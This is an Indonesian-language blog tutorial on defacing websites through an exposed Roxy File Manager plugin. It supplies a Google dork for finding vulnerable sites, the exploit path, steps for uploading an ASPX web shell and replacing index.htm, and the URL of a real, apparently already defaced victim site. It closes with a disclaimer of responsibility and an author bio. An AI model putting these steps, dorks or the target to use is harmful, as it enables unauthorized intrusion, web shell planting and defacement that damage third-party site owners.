Tutorial Cara Deface Metode Effi File Manager Upload Shell Vulnerability

Tutorial Cara Deface Metode Effi File Manager - Hai guys kali ini saya ingin memberitahu tentang Tutorial Cara Deface Metode Effi File Manager Upload Shell kalau kalian belom pernah coba poc yang satu ini akan sedikit membuat bingung karna target memakai windows server hehe, kalo udah master lewat aja jangan bully.

Yang Dibutuhkan :

1. ASPX Shell ( khusus untuk windows server ) | Jika belom ada Download disini.
2. Google Dork dan Exploit
3. Pc / Android
4. Kalem Terosss :v

Dork :

• inurl:jquery.tinymce.roxy.fileman ( kembangkan lagi )

Exploit : 

• /jquery.tinymce.roxy.fileman/

Step :

1. Dorking dulu webnya, jika sudah pilih salah satu.
2. kasih exploit, contoh : www.site.com/jquery.tinymce.roxy.fileman/ s
   
3. Lalu Upload Shellnya, misal : shell.aspx, tunggu sampai 100% berhasil.
   
4. Lalu untuk preview Shellnnya, buka www.site.com/jquery.tinymce.roxy.fileman/directory/shell.aspx 
   
5. Sudah seperti gambar diatas? yaudah itu udah terserah kalian, tapi kalau saya menitip file di dir htdocs/index.htm

Hasil : https://redoxomics.febsevents.org/index.htm

Live Target : https://redoxomics.febsevents.org/

Dibuat Oleh : ./E4OXY 

Nb : Saya tidak bertanggung jawab jika terjadi masalah, saya disini hanya membagikan ilmu, dan gunakan sebaik baiknya :)

Share this

Author : Sutarno Wirjo

"Halo, saya Sutarno Wirjo seorang bapak dari anak dan pekerja abdi negara maniak depan kompiuter yang tidak berhenti belajar dan senang mengeksplorasi kreativitas pada waktu luang saya. Hobi dengar musik , tarik suara, baca-baca dan penikmat kuliner kelas ampera emperan.

Related Posts